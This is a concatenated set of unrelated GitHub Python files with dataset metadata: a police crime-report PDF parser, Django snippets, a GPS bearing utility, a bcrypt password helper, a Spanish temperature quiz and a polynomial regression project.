SEA-group/wowp_scripts | 9,689,446,254,646 | 94f82dc83caf03914aa9c59eaea5782541a1dc3f | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/gui/HUD2/features/control/__init__.py | 0f90dffc160b5b7c5dd4a1c6a0aa7c22a7a7b672 | [] | no_license | https://github.com/SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Embedded file name: scripts/client/gui/HUD2/features/control/__init__.py
pass | UTF-8 | Python | false | false | 79 | py | 1,504 | __init__.py | 1,016 | 0.772152 | 0.759494 | 0 | 2 | 39 | 74 |
geekandglitter/SiteEvents | 18,614,388,275,606 | 95454914285417a245f4865305bd5af0b632a1fb | 00dd39d7d4975fec18987649fa4c86ad3434d7b6 | /SiteEventsAPP/context_processors.py | 89ce2105d8834a27832896f403445880ed2afa93 | [] | no_license | https://github.com/geekandglitter/SiteEvents | 44a68645cc82711a5ba27de89ac1560882e39d6e | 6bb01b30ca4b9103d28ff8d931ff58b61d431643 | refs/heads/master | 2020-05-04T23:06:43.631667 | 2019-07-10T19:58:01 | 2019-07-10T19:58:01 | 179,533,268 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Context processor allows the base html to have a view associated with it. We need it for the navbar dropdown.
def companies(request):
from os import listdir # listdir searches through a given path
dirlist = listdir('static/csv/')
return {'comps': dirlist}
| UTF-8 | Python | false | false | 273 | py | 28 | context_processors.py | 14 | 0.728938 | 0.728938 | 0 | 7 | 38 | 111 |
rbelew/OakCrime | 12,378,095,787,796 | 41a8b6ff01489e1edda511a804bc830b534d0a36 | cbe32e9c7e790d72789e9d5d3ad7924fc1aa0811 | /showCrime/dailyIncid/management/commands/parse_UCR.py | 46bc77a0f0c401a59415babefebc60f1ae7c9855 | [] | no_license | https://github.com/rbelew/OakCrime | 91eb2ce3b98ad2f2822c9a72cdb894b1fec7b129 | ac6194c7c6930ab5b9552bb2e0f169fa01c71dd7 | refs/heads/master | 2021-01-09T20:51:09.495083 | 2020-08-01T21:56:29 | 2020-08-01T21:56:29 | 10,574,718 | 14 | 14 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf8
''' parse_UCR_pdfquery
parse OPD weekly UCR reports
leans heavily on pdfplumber, esp. its TABLE extraction
https://github.com/jsvine/pdfplumber says:
Works best on machine-generated, rather than scanned, PDFs. Built on pdfminer and pdfminer.six.
Created on Nov 3, 2017
update 12 Feb 19
@author: rik
'''
from collections import defaultdict
import pickle # cPickle for python2
from datetime import datetime
import glob
import json
import os
import re
import sys
import pdfplumber
OPD_UCR_DateFormat = '%Y-%b-%d'
IgnoredLabels = ['Part 1 Crimes','THIS REPORT IS HIERARCHY BASED.',
'(homicide, aggravated assault, rape, robbery)' ]
LabelUCROrder = [u'Violent Crime Index',
u'Homicide – 187(a)PC',
u'Homicide – All Other *',
u'Aggravated Assault',
# 190212: new labeles
# u'Shooting with injury – 245(a)(2)PC',
u'Assault with a firearm – 245(a)(2)PC',
# u'Subtotal - Homicides + Injury Shootings',
u'Subtotal - Homicides + Firearm Assault',
u'Shooting occupied home or vehicle – 246PC',
u'Shooting unoccupied home or vehicle – 247PC',
u'Non-firearm aggravated assaults',
u'Rape',
u'Robbery',
u'Firearm',
u'Knife',
u'Strong-arm',
u'Other dangerous weapon',
# u'Residential robbery – 212.5(A)PC',
u'Residential robbery – 212.5(a)PC',
# u'Carjacking – 215(A) PC',
u'Carjacking – 215(a) PC',
u'Burglary',
u'Auto',
u'Residential',
u'Commercial',
u'Other (Includes boats, aircraft, and so on)',
u'Unknown',
u'Motor Vehicle Theft',
u'Larceny',
u'Arson',
u'Total' ]
IgnoreStatLbl = ['Author', 'CreateDate', 'ModDate', 'fname', 'fromDate', 'rptDate', 'toDate']
FixFilePat = {re.compile(r'Area(\d)WeeklyCrimeReport11Jun17Jun18.pdf'): '180619_Area %d Weekly Crime Report 11Jun - 17Jun18.pdf'}
def dateConvert(o):
if isinstance(o, datetime):
return o.strftime('%y%m%d')
def parse_UCR_pdf(inf,rptDate,fdate,tdate,verbose=False):
try:
pdf = pdfplumber.open(inf)
docinfo = pdf.metadata
pdf1 = pdf.pages[0]
allTbl = pdf1.extract_tables()
except Exception as e:
print('parse_UCR_pdf: cant load',inf,e)
return None
# .extract_table returns a list of lists, with each inner list representing a row in the table.
tbl = allTbl[0]
if verbose:
print('parse_UCR_pdf: Table found %d x %d' % (len(tbl),len(tbl[0]) ))
statTbl = {}
for i in range(len(tbl)):
lbl = tbl[i][0]
ignore = False
for ignoreLine in IgnoredLabels:
if lbl == None or lbl.startswith(ignoreLine):
ignore = True
break
if ignore:
continue
vals = tbl[i][1]
vals = vals.replace(' ','') # multi-digit numbers have intermediate spaces
if vals=='-':
val = 0
else:
try:
val = int(vals)
except Exception as e:
print(i,lbl,vals,e)
continue
if verbose:
print(i,lbl,val)
statTbl[lbl] = val
statTbl['Author'] = docinfo['Author']
statTbl['CreateDate'] = docinfo['CreationDate']
statTbl['ModDate'] = docinfo['ModDate']
statTbl['fname'] = fname
statTbl['rptDate'] = rptDate
statTbl['fromDate'] = fdate
statTbl['toDate'] = tdate
if verbose:
print('parse_UCR_pdf: NKey=%d %s' %(len(statTbl.keys()),inf))
return statTbl
def combineWeeksUCR(allStats):
allKeys = list(allStats.keys())
allKeys.sort()
# allLblTbl: lbl -> date -> div -> freq
allLblTbl = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
for k in allKeys:
divs,rptDate = k.split('_')
div = int(divs)
# NB: need to distinguish stat's lbl which may have \n from mlbl used in LabelUCROrder
for slbl in allStats[k]:
if slbl.find('\n') != -1:
mlbl = slbl.split('\n')[0]
else:
mlbl = slbl
if mlbl in LabelUCROrder:
allLblTbl[mlbl][rptDate][div] = allStats[k][slbl]
elif mlbl not in IgnoreStatLbl:
print("combineWeeksUCR: unknown label?! %s %s" % (mlbl,k))
return allLblTbl
def rptAllStats(allLblTbl,outf):
"""produce CSV file of UCR crime categories X dates, breaking out indiv divisions' subtotals
"""
allDatesSet = set()
for lbl in allLblTbl.keys():
allDatesSet.update(allLblTbl[lbl].keys())
allDates = list(allDatesSet)
allDates.sort()
# ASSUME five OPD division
OPDivs = range(1,6)
outs = open(outf,'w')
line = '"UCRCategory \ Date"'
for dates in allDates:
dateDup = 6 * (','+dates)
line += ('%s' % (dateDup))
outs.write(line+'\n')
line = 'Division'
for dates in allDates:
for div in OPDivs:
line += (',%d' % (div))
line += (',tot')
outs.write(line+'\n')
for lbl in LabelUCROrder:
albl = lbl.encode(encoding='utf_8', errors='strict').decode('ascii','ignore')
line = '"%s"' % (albl)
for dates in allDates:
tot = 0
for div in OPDivs:
if dates in allLblTbl[lbl] and div in allLblTbl[lbl][dates]:
val = int(allLblTbl[lbl][dates][div])
else:
val = 0
line += (',%d' % (val))
tot += val
line += (',%d' % (tot))
line += '\n'
outs.write(line)
outs.close()
def rptSummStats(allLblTbl,outf):
"""produce CSV file of UCR crime categories X dates, summing divisions' subtotals
also echo crime categories across all data
"""
allDatesSet = set()
for lbl in allLblTbl.keys():
allDatesSet.update(allLblTbl[lbl].keys())
allDates = list(allDatesSet)
allDates.sort()
lblTots = defaultdict(int)
# ASSUME five OPD division
OPDivs = range(1,6)
outs = open(outf,'w')
line = '"UCRCategory \ Date"'
for dates in allDates:
line += (',%s' % (dates))
outs.write(line+'\n')
for lbl in LabelUCROrder:
albl = lbl.encode(encoding='utf_8', errors='strict').decode('ascii','ignore')
line = '"%s"' % (albl)
for dates in allDates:
tot = 0
for div in OPDivs:
if dates in allLblTbl[lbl] and div in allLblTbl[lbl][dates]:
tot += int(allLblTbl[lbl][dates][div])
lblTots[lbl] += tot
line += (',%s' % (tot))
line += '\n'
outs.write(line)
outs.close()
for lbl in LabelUCROrder:
if lblTots[lbl] == 0:
print('%s\t%d <=======' % (lbl,lblTots[lbl]))
else:
print('%s\t%d' % (lbl,lblTots[lbl]))
# Police Area 3 Weekly Crime Reports
DivDirName_pat = re.compile(r'Police Area (\d) Weekly Crime Reports')
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
FileName_pat = re.compile(r'(\d+)_Area (\d) Weekly Crime Report (\d+)(\D+) - (\d+)(\D+)(\d+).pdf')
def fname2dates(fname):
# 190212
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
match = FileName_pat.match(fname)
if match:
# match.groups() = ('190114', '2', '07', 'Jan', '13', 'Jan', '19')
(postDateStr,areaNum,fday,fmon,tday,tmon,yr) = match.groups()
else:
print('fname2dates: cant parse',fname)
# import pdb; pdb.set_trace()
return None,None,None
# HACK: common exceptions (:
if tmon == 'Sept':
tmon = 'Sep'
if yr.startswith('20'):
yr = yr[2:]
rptDate = datetime.strptime(postDateStr,'%y%m%d')
try:
fdate = datetime.strptime('%s%s%s' % (fday,fmon,yr),'%d%b%y')
tdate = datetime.strptime('%s%s%s' % (tday,tmon,yr),'%d%b%y')
except:
print('fname2dates: bad dates?', fname)
# import pdb; pdb.set_trace()
fdate = tdate = None
return rptDate,fdate,tdate
if __name__ == '__main__':
dataDir = '/Data/c4a-Data/OAK_data/OPD-UCR/190212-harvest/'
begTime = datetime.now()
dateStr = begTime.strftime('%y%m%d')
jsonFile = dataDir + 'UCR_WeeklyStats_%s.json' % (dateStr)
statsOnly = False
if statsOnly:
print('parse_UCR: loading data from JSON file',jsonFile)
allStats = json.load(open(jsonFile))
print('parse_UCR: NStatFiles = %d' % (len(allStats)))
else:
rptFreq = 10
checkPointFreq = 50
divDirList = glob.glob(dataDir+'Police Area *')
allPDFiles = []
for divDirPath in divDirList:
if not os.path.isdir(divDirPath):
continue
ddpath,divDir = os.path.split(divDirPath)
match = DivDirName_pat.match(divDir)
if match:
# match.groups() = ('2')
divNumStr = match.groups()
divNum = int(divNumStr[0])
else:
print('parse_UCR: cant parse divDir',divDir)
continue
print('parse_UCR: NFiles=%d searching files for Div=%d : %s' % (len(allPDFiles),divNum,divDir ))
for divSubDir in glob.glob(divDirPath+'/*'):
# NB: pdfs are posted at top-level within division?!
if os.path.isfile(divSubDir):
if divSubDir.endswith('.pdf'):
allPDFiles.append( (divNum,divSubDir) )
else:
print('parse_UCR: skipping non-PDF file',divSubDir)
continue
if os.path.isdir(divSubDir):
for f in glob.glob(divSubDir+'/*.pdf'):
allPDFiles.append( (divNum,f) )
print('parse_UCR: NFiles found=%d' % (len(allPDFiles)))
nbad = 0
allStats = {}
for i,info in enumerate(allPDFiles):
# NB: checkpoint saved at top of loop,
if i > 0 and (i % checkPointFreq == 0):
cpjson = dataDir + 'UCR_WeeklyStats_%s_cp-%d.json' % (dateStr,i)
json.dump(allStats,open(cpjson,'w'),indent=1,default=dateConvert)
divNum,pdff = info
dirname,fname = os.path.split(pdff)
for fixPat in FixFilePat.keys():
match = fixPat.match(fname)
if match:
# match.groups() = ('2')
divNumStr = match.groups()
divNum = int(divNumStr[0])
newfname = FixFilePat[fixPat] % divNum
print('parse_UCR: fixing bad fname: %s <- %s' % (newfname,fname))
fname = newfname
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
rptDate,fdate,tdate = fname2dates(fname)
try:
statTbl = parse_UCR_pdf(pdff,rptDate,fdate,tdate)
except Exception as e:
print('parse_UCR: cant process %d %s %s' % (i,fname,e))
nbad += 1
continue
if statTbl==None:
print('parse_UCR: cant process (None) %d %s' % (i,fname))
nbad += 1
continue
if rptDate == None:
rptDateStr = 'missDate-%d' % (i)
else:
rptDateStr = rptDate.strftime('%y%m%d')
k = '%d_%s' % (divNum,rptDateStr)
if k in allStats:
print('parse_UCR_Pdf: duplicate keys?! %s\n\t%s\n\t%s' % \
(k,statTbl,allStats[k]))
continue
allStats[k] = statTbl
# NB: reporting at end of loop,
if i > 0 and (i % rptFreq == 0):
elapTime = datetime.now() - begTime
print('%d %s done (%s sec)' % (i,k,elapTime.total_seconds()))
print('parse_UCR: NStatFiles = %d' % (len(allStats)))
json.dump(allStats,open(jsonFile,'w'),indent=1,default=dateConvert)
allLblTbl = combineWeeksUCR(allStats)
statFile = dataDir + 'UCR_WeeklyStats_%s.csv' % (dateStr)
rptAllStats(allLblTbl, statFile)
statFile = dataDir + 'UCR_WeeklySummStats_%s.csv' % (dateStr)
rptSummStats(allLblTbl, statFile)
| UTF-8 | Python | false | false | 10,597 | py | 76 | parse_UCR.py | 34 | 0.638366 | 0.621537 | 0 | 394 | 25.832487 | 129 |
MarkusH/django-migrations-benchmark | 489,626,306,798 | cf0331a469d22fe17b3a425481dbc39c7ede1a9e | 10fbe5526e5f0b8588b65f70f088cd86b6e9afbe | /wyxbcga/migrations/0005_xqjugixefj_bbwlhkxvqd.py | d4af67b61f7d87e0c026ca0cf67c49075fed16b8 | [] | no_license | https://github.com/MarkusH/django-migrations-benchmark | eb4b2312bb30a5a5d2abf25e95eca8f714162056 | e2bd24755389668b34b87d254ec8ac63725dc56e | refs/heads/master | 2016-09-05T15:36:45.250134 | 2015-03-31T23:44:28 | 2015-03-31T23:44:28 | 31,168,231 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ysgxuyu', '0005_auto_20150218_1622'),
('wyxbcga', '0004_remove_xqjugixefj_xvbpvsvwrw'),
]
operations = [
migrations.AddField(
model_name='xqjugixefj',
name='bbwlhkxvqd',
field=models.OneToOneField(null=True, related_name='+', to='ysgxuyu.Bmovnbnmed'),
),
]
| UTF-8 | Python | false | false | 509 | py | 540 | 0005_xqjugixefj_bbwlhkxvqd.py | 540 | 0.603143 | 0.561886 | 0 | 20 | 24.45 | 93 |
petemarshall77/RoboMagellan-2016 | 10,213,432,243,445 | efabceb49fa2410a4095190b34d4da95c0a91cec | ad567674f2731deda506b0c2c98dfc2aba3a5d1d | /utils.py | 84e72990c449094d658c035e5f2c3c1996defa14 | [] | no_license | https://github.com/petemarshall77/RoboMagellan-2016 | 0f657fcc22cabcef74d5f9e5a2fb144d6d2c6557 | 2edc3d3632204d4a194c8792f6366baf35d028ed | refs/heads/master | 2021-01-10T18:44:37.913033 | 2016-03-30T02:01:03 | 2016-03-30T02:01:03 | 37,494,879 | 1 | 0 | null | false | 2015-12-20T20:38:38 | 2015-06-15T22:31:52 | 2015-12-17T20:13:27 | 2015-12-20T20:38:38 | 45 | 0 | 0 | 0 | Python | null | null | import math
class Utils:
@staticmethod
def get_distance_and_bearing(from_lat, from_long, to_lat, to_long):
from_lat = Utils.degrees_to_radians(from_lat)
from_long = Utils.degrees_to_radians(from_long)
to_lat = Utils.degrees_to_radians(to_lat)
to_long =Utils.degrees_to_radians(to_long)
delta_lat = to_lat - from_lat
delta_long = to_long - from_long
a = math.sin(delta_lat/2) * math.sin(delta_lat/2) + math.cos(from_lat) * \
math.cos(to_lat) * math.sin(delta_long/2) * math.sin(delta_long/2)
c = 2 * (math.atan2(math.sqrt(a), math.sqrt(1 - a)))
distance = 6371000 * c
y = math.sin(from_long - to_long) * math.cos(to_lat)
x = math.cos(from_lat) * math.sin(to_lat) - math.sin(from_lat) * \
math.cos(to_lat) * math.cos(from_long - to_long)
bearing = (Utils.radians_to_degrees(math.atan2(y,x)) + 360) % 360
return (distance, bearing)
@staticmethod
def degrees_to_radians(angle):
return angle * math.pi / 180.0
@staticmethod
def radians_to_degrees(radians):
return radians * 180 / math.pi
| UTF-8 | Python | false | false | 1,154 | py | 22 | utils.py | 21 | 0.598787 | 0.574523 | 0 | 32 | 35.0625 | 82 |
WangYi-star/MyPythonCode | 17,978,733,114,688 | 20c0fa6644c31416635c28bccacb2c0c07b4c9f2 | 79b06a6091865a1802c39b7c6bc8ef51eecc23ae | /homework2/question2.py | a5327b6425b883607d595dee55a53fc78ea6466b | [] | no_license | https://github.com/WangYi-star/MyPythonCode | 416543148b13328276a2f9461aedd522ee9423ac | 61dd8e781fa595aa7e8456438d69d4de9275cdbc | refs/heads/master | 2021-07-20T00:30:19.890224 | 2020-06-25T07:06:09 | 2020-06-25T07:06:09 | 244,940,357 | 0 | 0 | null | false | 2021-03-20T04:25:44 | 2020-03-04T15:49:48 | 2020-06-25T07:06:35 | 2021-03-20T04:25:42 | 3,674 | 0 | 0 | 1 | Python | false | false | # -*- encoding: utf-8 -*-
'''
@File : question2.py
@Time : 2020/03/08 20:25:58
@Author : xdbcb8
@Version : 1.0
@Contact : xdbcb8@qq.com
@WebSite : www.xdbcb8.com
'''
# here put the import lib
'''
编写一个函数,接收n个数字,求这些参数数字的和;
'''
def getsum():
sum=0;
n=int(input("请输入数字个数:"))
print("请输入数字:")
for i in range(0,n):
sum=sum+int(input())
print("数字求和:")
print(sum)
getsum()
| UTF-8 | Python | false | false | 478 | py | 99 | question2.py | 92 | 0.582915 | 0.525126 | 0 | 23 | 16.304348 | 28 |
crisfelip/programacion1 | 17,343,077,948,171 | eded8790846e0c91af45c62b2394893b87bd28c0 | 07290ade70dc658eda30150e2eaf9c60d490cd1f | /clases/examenes/quiz2.py | 53ea4da908c7ff1a7fc5500976b32fcf02378fa2 | [] | no_license | https://github.com/crisfelip/programacion1 | 5d1aea0a3f9ac733c5663c25d6b9263f6ea44a01 | 5fb1a81ba6ac34e875a4bc4fe54ccde34b0d7bf7 | refs/heads/main | 2023-05-26T23:28:24.992906 | 2021-05-27T13:08:14 | 2021-05-27T13:08:14 | 335,283,296 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | Temperatura_Corporal = [36,37,38,35,36,38,37.5,38.2,41,37.4,38.6,39.1,40.3,33]
preguntamenu = '''buen dia espero te encuentres bien
1- conversion de temperatura
2- clasificacion de temperatura
3- temperatura max y min
4- salir
escoga una opcion para continuar '''
preguntaconversion = '''
c- temperatura en celsius
k- temperatura en kelvin
f- temperatura en fahrenheit
ingrese la letra dependiendo en que unidades quiera el resultado : '''
mensajecelsius= 'los datos estan en celsius por lo que no se requiere una conversion '
mensajeeleccion = 'elegiste la opcion {}'
mensajeerrormen = 'error, utilice una opcion permitida'
mensajesalida = 'feliz dia cualquiera que este sea'
#codigoooooo
opcion = int(input(preguntamenu))
#conversiones
listafahrenheit =[]
listakelin = []
for elemento in Temperatura_Corporal:
fahrenheit = round (elemento*1.8)+ 32
listafahrenheit.append (fahrenheit)
for elemento in Temperatura_Corporal:
kelvin = round (elemento + 273.15)
listakelin.append(kelvin)
#clasificaciones
listaclasificacion = []
for elemento in Temperatura_Corporal:
clasificacion = ""
if (elemento < 36):
clasificacion = 'hipotermia'
elif (elemento >= 36 and elemento <=37.5):
clasificacion= 'temperatura normal'
elif (elemento >=37.6):
clasificacion= 'fiebre'
else:
clasificacion= 'datos errados'
listaclasificacion.append (clasificacion)
# temperatura max y min
maxima = max(Temperatura_Corporal)
minima = min(Temperatura_Corporal)
# menu
while (opcion !=4):
if (opcion == 1):
print(mensajeeleccion.format(1))
conversion = input(preguntaconversion)
if(conversion == 'c'):
print (mensajecelsius)
print (Temperatura_Corporal)
elif(conversion == 'f'):
print (listafahrenheit)
elif (conversion == 'k'):
print (listakelin)
else: (mensajeerrormen)
elif (opcion == 2):
print (mensajeeleccion.format(2))
(listaclasificacion)
elif (opcion == 3):
print (mensajeeleccion.format(3))
print ('la temperatura maxima es', maxima)
print ('la temperatura minima es', minima)
else:
print (mensajeerrormen)
opcion = int (input (preguntamenu))
print (mensajesalida) | UTF-8 | Python | false | false | 2,336 | py | 29 | quiz2.py | 28 | 0.667808 | 0.640411 | 0 | 81 | 27.851852 | 86 |
x92499/CTES | 13,056,700,604,629 | bfcbfd29eab3d804308534b133aefa26e12f1dc2 | 18994bb4bac9d7e62d19479e234c44f0b9e1197c | /add_ice_storage_to_plant_loop_for_load_flexiblity/analysis/performance.py | 87296c85b76b7cdd7c74e67fc9241dacc681361d | [
"BSD-2-Clause"
] | permissive | https://github.com/x92499/CTES | 935a92395153df97915afa281a44f024d5c2796b | ac068a320ad5aa216d675d7f6239fdc8f879859b | refs/heads/master | 2020-12-29T23:26:11.468852 | 2020-06-22T16:08:44 | 2020-06-22T16:08:44 | 209,821,176 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Ice Performance Curve Function
# Karl Heine, 9/2019
# This function calculates the maximum ice discharge rate
# Ref. E+ Engineering Reference, section 15.1.2, (p. 791 in v. 9.1.0)
def ice_performance (soc, return_temp, supply_temp, ice_cap, flag):
# Import req'd packages
import numpy as np
# Ice Storage Curve Parameters
c = [0, 0.09, -0.15, 0.612, -0.324, -0.216] # Same Coefficients for both charge and discharge in OS default
x_rng = [0, 1] # Range on SOC Variable Inputs
y_rng = [0, 9.9] # Range on DTlm* Variable Inputs
freeze_temp = 0 # Freezing temperature of the ice storage [C]
DTlm_nom = 10 # Nominal delta T, must equal 10C based on E+ Engineering Reference Guide
# Set Charge or Discharge values based on flag
if flag == 0: # Discharging
x = (1 - soc)
elif flag == 1: # Charging - Incomplete!
x = soc
if (return_temp - freeze_temp) / (supply_temp - freeze_temp) >= 0:
DTlm = (return_temp - supply_temp) / np.log((return_temp - freeze_temp) / (supply_temp - freeze_temp))
else:
DTlm = 0
y = DTlm / DTlm_nom # Non-dimensionalized DTlm value
# Check limits on input variable values
# x is either percent charged or percent discharged
if x < x_rng[0]:
x = x_rng[0]
elif x > x_rng[1]:
x = x_rng[1]
# y is non-dimensionalized log mean temperature difference across ice heat exchanger
if y < y_rng[0]:
y = y_rng[0]
elif y > y_rng[1]:
y = y_rng[1]
# Max rate of discharge from ice - neglect charging for now.
q_star = (c[0] + (c[1] * x) + (c[2] * (x**2))) + ((c[3] + (c[4] * x) + (c[5] * (x**2))) * y)
q = q_star * ice_cap / 1 # Divisor is timestep of performance curve [hr], assumed to be 1 hr.
return q;
| UTF-8 | Python | false | false | 1,849 | py | 9 | performance.py | 6 | 0.587345 | 0.551109 | 0 | 49 | 36.734694 | 119 |
kacpert20/project-jumper | 2,576,980,383,241 | 570b901b50708ba3d10805835af0312e902027b4 | 12493b1fbcf498e9267a7037e2f96991089e2a86 | /project-jumper-00.py | 2599e7ce840d69da7d2335c7af5e21c4140f6ddf | [
"MIT"
] | permissive | https://github.com/kacpert20/project-jumper | 515fe704583fbb35202ca12ca431763e16d8b7ae | a66a42c18cf952337720d0104d777f9307c5aac4 | refs/heads/main | 2023-03-01T12:14:43.813537 | 2021-02-12T10:54:05 | 2021-02-12T10:54:05 | 338,280,075 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # to jest komentarz
import pgzrun
WIDTH = 474
HEIGHT = 842
def draw():
screen.blit("background.jpeg", (0,0))
pgzrun.go()
| UTF-8 | Python | false | false | 131 | py | 1 | project-jumper-00.py | 1 | 0.648855 | 0.587786 | 0 | 12 | 9.916667 | 41 |
Kakanaporn/Django50Hrs_ByUncleEngineer | 16,664,473,118,449 | 3aea92236098df5331126c71f1dddcb237a75a2e | 1d1606ff0b94e70bc486d5d6c9691b5a7544937e | /myapp/templatetags/custom_tags.py | e3ffa47eac098028f73f8878b2574cf3e010840c | [] | no_license | https://github.com/Kakanaporn/Django50Hrs_ByUncleEngineer | 738574d27663b573ba93bd1a4967f8a7cbe5ee37 | f1b50382d5c1b6c985af94881b13d450f8222c75 | refs/heads/master | 2023-02-27T11:14:13.526425 | 2021-01-11T09:34:43 | 2021-01-11T09:34:43 | 328,596,749 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #custom tags {% load custom_tags %}
from django import template
from ..models import Allproduct,Category
register = template.Library()
@register.simple_tag
def hello_tag(): #{% hello_tag %}
return '<-----Hello Tag----->'
@register.simple_tag
def show_allproduct():
count = Allproduct.objects.count()
return count
@register.inclusion_tag('myapp/allcategory.html')
def all_category():
cats = Category.objects.all()
return {'allcats':cats} | UTF-8 | Python | false | false | 462 | py | 21 | custom_tags.py | 9 | 0.692641 | 0.692641 | 0 | 21 | 21.047619 | 49 |
korposdavid/ask-mate-python | 9,216,999,823,649 | 026d39cb3336effc95e1b2f5c0c3200f2af17675 | 66296cae3cba84dfddb5c168bc2e13eb5fcda482 | /util.py | 13f1e7ed6d5fe1cc0ba13032f9c680a57d1c9756 | [] | no_license | https://github.com/korposdavid/ask-mate-python | 5bbef0d458c22d8e3ff9b4261443c4696dae1664 | 227b152fe81c9bdbdf4b381f6404adb33061c153 | refs/heads/master | 2020-05-23T02:25:56.696366 | 2019-06-14T10:42:57 | 2019-06-14T10:42:57 | 186,602,594 | 0 | 1 | null | true | 2019-05-14T10:48:33 | 2019-05-14T10:48:33 | 2018-10-10T08:53:40 | 2019-04-25T12:36:01 | 9 | 0 | 0 | 0 | null | false | false | from datetime import datetime
import bcrypt
import data_manager
def date_now():
dt = datetime.now()
return dt.replace(microsecond=0)
def hash_password(plain_text_password):
hashed_bytes = bcrypt.hashpw(plain_text_password.encode('utf-8'), bcrypt.gensalt())
return hashed_bytes.decode('utf-8')
def verify_password(plain_text_password, username):
try:
hashed_password = data_manager.get_hashed_password_for_user(username)
hashed_bytes_password = hashed_password.encode('utf-8')
return bcrypt.checkpw(plain_text_password.encode('utf-8'), hashed_bytes_password)
except TypeError:
return False
| UTF-8 | Python | false | false | 651 | py | 21 | util.py | 4 | 0.711214 | 0.703533 | 0 | 22 | 28.590909 | 89 |
nicy1/hmm | 12,601,434,055,948 | 8f02346540ce66b23522276890642859b8bf49ce | cd0768362e80de0aeccea77e8380213189f86271 | /Benchmark/arima/readfile.py | beebb9b90e03df69f9078d1c12ec1917ffbbeb4e | [] | no_license | https://github.com/nicy1/hmm | bfbdb4184db788d5a2afca6f5f78de6e8dce25cb | bfeb52ebf26c7ba0493628b6dab8d0ac94b9a43b | refs/heads/master | 2023-02-02T23:04:38.720606 | 2020-12-22T15:31:05 | 2020-12-22T15:31:05 | 264,662,691 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import csv
from collections import OrderedDict
# ==========================================================================
class reader:
def __init__ (self, filename):
self.filename = filename
def read_csv (self):
table = {"0":0.0, "1":1.0, "2":2.0, "4":3.0, "5":4.0}
series = []
data = csv.DictReader(open(self.filename, mode='r'))
for row in data:
x = str(row['ActionType'])
series.append(table[x])
return series
# ========================================================================== | UTF-8 | Python | false | false | 592 | py | 32 | readfile.py | 18 | 0.402027 | 0.376689 | 0 | 24 | 23.708333 | 76 |
elliotgreenlee/machine-learning-examples | 11,897,059,416,904 | c5e92eb05549798981622341d659c94cf7cde43b | f294bb670f6c15d4143e567af8222845055c9f12 | /basic_machine_learning/polynomial_regression/project1.py | f6bb88f2d29398bf78125f8097db53d2f6a9e221 | [] | no_license | https://github.com/elliotgreenlee/machine-learning-examples | 52bc0ce76c5839ca93932116769f1c8767a0c4fd | 05cf87a06a9c03185883793bea4055c69a4a2194 | refs/heads/main | 2023-04-01T08:13:24.654570 | 2021-04-14T02:28:05 | 2021-04-14T02:28:05 | 357,742,621 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Data import *
from PolynomialRegression import PolynomialRegression
import numpy as np
import math
def rmse(real, prediction):
error = 0
for r, p in zip(real, prediction):
error += math.pow(r - p, 2)
error = math.sqrt(error / (len(real) * 1.0))
return error
def r_squared(real, prediction):
mean = 0
for instance in real:
mean += instance
mean /= len(real) * 1.0
ss_tot = 0
for instance in real:
ss_tot += math.pow(instance - mean, 2)
ss_res = 0
for r, p in zip(real, prediction):
ss_res += math.pow(r - p, 2)
r2 = 1 - (ss_res / (ss_tot * 1.0))
return r2
def print_comparison(real, prediction):
print("Real : Prediction")
for r, p in zip(real, prediction):
print("{} : {}".format(r, p))
NUMBER_OF_FEATURES = 7
NUMBER_OF_BATCHES = 5
def batch(number_of_batches, number_of_samples):
all_indices = np.arange(0, number_of_samples) # get all possible indices
np.random.shuffle(all_indices)
if number_of_batches is 1:
TRAINING_SIZE = 292
training = [all_indices[:TRAINING_SIZE]]
testing = [all_indices[TRAINING_SIZE:]]
return training, testing
remainder = number_of_samples % number_of_batches
samples_per_batch = int(number_of_samples / number_of_batches)
training_batches = []
testing_batches = []
current_index = 0
for i in range(number_of_batches):
old_index = current_index
current_index += samples_per_batch
if i < remainder:
current_index += 1
train_batch = np.concatenate((all_indices[:old_index], all_indices[current_index:]))
test_batch = all_indices[old_index:current_index]
training_batches.append(train_batch)
testing_batches.append(test_batch)
return training_batches, testing_batches
def main():
data = AutoData("auto-mpg.data", NUMBER_OF_FEATURES)
data.normalize()
data.pca_reduce(4)
data.stats()
# split data indices into NUMBER_OF_BATCHES batches
training_batches, testing_batches = batch(NUMBER_OF_BATCHES, len(data.data))
# for each batch
for training_indices, testing_indices in zip(training_batches, testing_batches):
# Nothing
training = Data()
for index in training_indices:
training.features.append(data.features[index])
training.r.append(data.r[index])
# extract testing set
testing = Data()
for index in testing_indices:
testing.features.append(data.features[index])
testing.r.append(data.r[index])
# Run regression
polynomial = PolynomialRegression(training, testing)
polynomial.train(1)
real, prediction = polynomial.test(1)
print(r_squared(real, prediction))
polynomial = PolynomialRegression(training, testing)
polynomial.train(2)
real, prediction = polynomial.test(2)
print(r_squared(real, prediction))
polynomial = PolynomialRegression(training, testing)
polynomial.train(3)
real, prediction = polynomial.test(3)
print(r_squared(real, prediction))
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 3,223 | py | 128 | project1.py | 49 | 0.627056 | 0.617127 | 0 | 118 | 26.313559 | 92 |
